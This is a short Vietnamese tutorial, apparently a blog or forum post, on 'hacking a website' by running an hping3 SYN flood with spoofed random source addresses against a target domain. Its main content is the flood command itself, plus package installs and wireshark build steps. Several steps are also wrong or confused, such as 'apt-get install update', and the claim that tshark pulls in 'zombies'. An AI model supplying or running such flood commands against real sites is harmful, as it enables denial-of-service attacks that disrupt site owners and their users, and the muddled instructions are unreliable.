Mở Terminal lên và setup các gói cần thiết để setup cho nó đầy đủ trước,sau đó ta gõ các lệnh như sau:

Mở tab1 Terminal lên gõ lệnh xem địa chỉ IP của máy:

$ifconfig   (lệnh xem thông tin IP của máy)

>>lúc này nó sẽ show ra các thông số của máy tính,ta để ý và quan tâm dòng “etho” đầu tiên,ta sẽ nhìn thấy địa chỉ IP máy của ta ở cạnh bên,ta copy dãy số ngắn đó lại,và mở thêm tab Terminal 2 để tải thêm các gói cần thiết như sau,nhớ chạy dưới quyền root nhé:

$sudo su  (chạy dưới quyền root)

#sudo apt-get install update        hoặc   #apt-get install update

#sudo apt-get install upgrade      hoặc   #apt-get install upgrade

#apt-get install php

#apt-get install python

#apt-get install hping3

                                                          #tshark  >>>Để cho nó auto load zombie về tools và vào tools

>Ta mở lại tb Terminal đầu tiên và gõ:

#clear

#hping3 -c 10000000 -d 120 -S -V -w 64 –flood –rand-source abcd.com

>>> Lúc này chương trình hack website bắt đầu

>>Con số 10triệu kia có nghĩa là ta mong muốn bao nhiêu lượt truy cập zombie tấn công trang web,ta có thể để bao nhiêu tùy thích,và abcd.com là tên website mà ta muốn hack,ta chỉ cần điền tên miền thôi.

 

>>>Lưu ý:

Nếu ta gõ mở tools theo lệnh #tshark mà trên máy báo chưa có gói này sẵn thì ta buộc phải tải gói này về máy theo link dưới đây.

#wget https://www.wireshark.org/download/src/wireshark-3.0.0.tar.xz -O /tmp/wireshark-3.0.0.tar.xz

#tar -xvf /tmp/wireshark-3.0.0.tar.xz

#cd /tmp/wireshark-3.0.0

#sudo apt update && sudo apt dist-upgrade

#sudo apt install cmake libglib2.0-dev libgcrypt20-dev flex yacc bison byacc \

#libpcap-dev qtbase5-dev libssh-dev libsystemd-dev qtmultimedia5-dev \

#libqt5svg5-dev qttools5-dev

#cmake .

#make

#sudo make install

sau đó ta sử dụng như trên.

 

Code Verify: cjs0ks3